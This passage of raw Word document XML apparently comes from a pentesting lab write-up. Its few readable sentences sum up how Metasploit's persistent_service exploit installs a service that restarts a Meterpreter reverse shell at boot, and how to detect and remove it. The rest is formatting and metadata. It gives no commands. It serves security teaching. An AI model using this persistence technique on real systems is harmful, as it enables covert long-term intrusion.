      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D80CD0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>persistent_service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D80CD0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit. We saw how the exploit created a service scheduled to </w:t>
      </w:r>
      <w:r w:rsidR="00BF52EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">start each time the machine was restarted </w:t>
      </w:r>
      <w:r w:rsidR="00BF52EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>automatically</w:t>
      </w:r>
      <w:r w:rsidR="00D80CD0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This allowed the target to reestablish a reverse shell with our Meterpreter session running on our Kali Linux machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A143B" w14:textId="14174195" w:rsidR="00823CA0" w:rsidRDefault="00823CA0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We have all heard the stories</w:t>
      </w:r>
      <w:r w:rsidR="00BF52EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> how a government network or a bank was found to have been compromised for years. The hackers used a persistent connection to come and go as they pleased. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4BE0BB" w14:textId="1DA5DBC8" w:rsidR="00D80CD0" w:rsidRDefault="00D80CD0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We also learned how to identify the exploit and the processes it </w:t>
      </w:r>
      <w:r w:rsidR="00071FC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> running. We also learned how to remove this type of persistent connection. Establishing a reverse shell and then creating a persistent backdoor is what hackers and pentesters live for. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD008D" w14:textId="319276F1" w:rsidR="00C222C3" w:rsidRDefault="00C222C3" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C846CEF" w14:textId="2AB634D4" w:rsidR="00923D77" w:rsidRPr="00923D77" w:rsidRDefault="00923D77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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5E1F71" w14:textId="7B4411D6" w:rsidR="00923D77" w:rsidRPr="00923D77" w:rsidRDefault="00923D77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343863C7" w14:textId="77777777" w:rsidR="00967000" w:rsidRP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</w:p>
    <w:p w14:paraId="79DDA74D" w14:textId="77777777" w:rsidR="00967000" w:rsidRPr="00967000" w:rsidRDefault="00967000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4C924A" w14:textId="77777777" w:rsidR="00967000" w:rsidRP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</w:p>
    <w:p w14:paraId="65EDA73D" w14:textId="77777777" w:rsidR="00967000" w:rsidRPr="00967000" w:rsidRDefault="00967000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595DD6CF" w14:textId="77777777" w:rsidR="002D10F3" w:rsidRPr="00AC492F" w:rsidRDefault="002D10F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002D10F3" w:rsidRPr="00AC492F">
      <w:footerReference w:type="default" r:id="rId5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B28DE7" w14:textId="77777777" w:rsidR="00654A1E" w:rsidRDefault="00654A1E" w:rsidP="00D21EA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5D1D1986" w14:textId="77777777" w:rsidR="00654A1E" w:rsidRDefault="00654A1E" w:rsidP="00D21E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91000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7FFB1B" w14:textId="6A4CCF78" w:rsidR="00D21EA9" w:rsidRDefault="00D21EA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90A1E1" w14:textId="77777777" w:rsidR="00D21EA9" w:rsidRDefault="00D21E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70E076" w14:textId="77777777" w:rsidR="00654A1E" w:rsidRDefault="00654A1E" w:rsidP="00D21EA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B7AE46A" w14:textId="77777777" w:rsidR="00654A1E" w:rsidRDefault="00654A1E" w:rsidP="00D21E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841040"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58342B6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I0Nze2MLA0tDQxtDRV0lEKTi0uzszPAykwqgUAnujkyywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="006114B0"/>
    <w:rsid w:val="00024084"/>
    <w:rsid w:val="00054F40"/>
    <w:rsid w:val="00071FC0"/>
    <w:rsid w:val="0012481E"/>
    <w:rsid w:val="002D10F3"/>
    <w:rsid w:val="002D6FB4"/>
    <w:rsid w:val="003122CD"/>
    <w:rsid w:val="003978D8"/>
    <w:rsid w:val="00415975"/>
    <w:rsid w:val="004C4E0F"/>
    <w:rsid w:val="00542BD7"/>
    <w:rsid w:val="00566AF1"/>
    <w:rsid w:val="006114B0"/>
    <w:rsid w:val="0061797F"/>
    <w:rsid w:val="0064475E"/>
    <w:rsid w:val="00654A1E"/>
    <w:rsid w:val="00717F0B"/>
    <w:rsid w:val="00760012"/>
    <w:rsid w:val="00823CA0"/>
    <w:rsid w:val="00835B7A"/>
    <w:rsid w:val="00923D77"/>
    <w:rsid w:val="00967000"/>
    <w:rsid w:val="00A66F1D"/>
    <w:rsid w:val="00AC492F"/>
    <w:rsid w:val="00B202FF"/>
    <w:rsid w:val="00B702ED"/>
    <w:rsid w:val="00BE3DE0"/>
    <w:rsid w:val="00BF52EE"/>
    <w:rsid w:val="00C222C3"/>
    <w:rsid w:val="00CB5EDC"/>
    <w:rsid w:val="00D21EA9"/>
    <w:rsid w:val="00D80CD0"/>
    <w:rsid w:val="00DB57FD"/>
    <w:rsid w:val="00E06606"/>
    <w:rsid w:val="00E93DBA"/>
    <w:rsid w:val="00EA255E"/>
    <w:rsid w:val="00F207CA"/>
    <w:rsid w:val="00F42E42"/>
    <w:rsid w:val="00F54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C8718"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{740642D6-BAD8-4C5F-97AA-B7A37D718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F40"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006114B0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114B0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="en-PH"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="006114B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114B0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PH"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B702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597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21E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EA9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D21E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E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9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dropbox.com/s/e8tbzcwb9gc4yw2/Lab%20-%20Spawn%20a%20Meterpreter%20session%20With%20Windows%207%20Pro.pdf?dl=0" TargetMode="External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customXml" Target="../customXml/item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customXml" Target="../customXml/item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0A7F172C5EE048A75076ADC8E355A4" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="2eab033d16405525bba2801506204075">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="fc7a74ca-ef6e-4b0f-95f3-d7c4a276d6d9" xmlns:ns3="3eaacd65-9674-480c-8572-fc08d144a0a5" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="5093699c1eb8e8bf894f72fa14c9e6dd" ns2:_="" ns3:_="">
    <xsd:import namespace="fc7a74ca-ef6e-4b0f-95f3-d7c4a276d6d9"/>
    <xsd:import namespace="3eaacd65-9674-480c-8572-fc08d144a0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7a74ca-ef6e-4b0f-95f3-d7c4a276d6d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711ad0ef-fa38-40c9-ade1-7f2ab384886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aacd65-9674-480c-8572-fc08d144a0a5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1d19a16b-9ab7-4ea1-87eb-4e85f9d6deca}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="3eaacd65-9674-480c-8572-fc08d144a0a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C8508A0-D3C9-42CB-B53E-4893A1BEC3AF}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3BD38D47-43AF-4A45-9F63-7CB09FD0E8B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1</Pages>
  <Words>1243</Words>
  <Characters>7091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 krahenbill</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>cliff krahenbill</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <cp:lastPrinted>2020-12-21T07:53:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-20T02:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-21T07:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>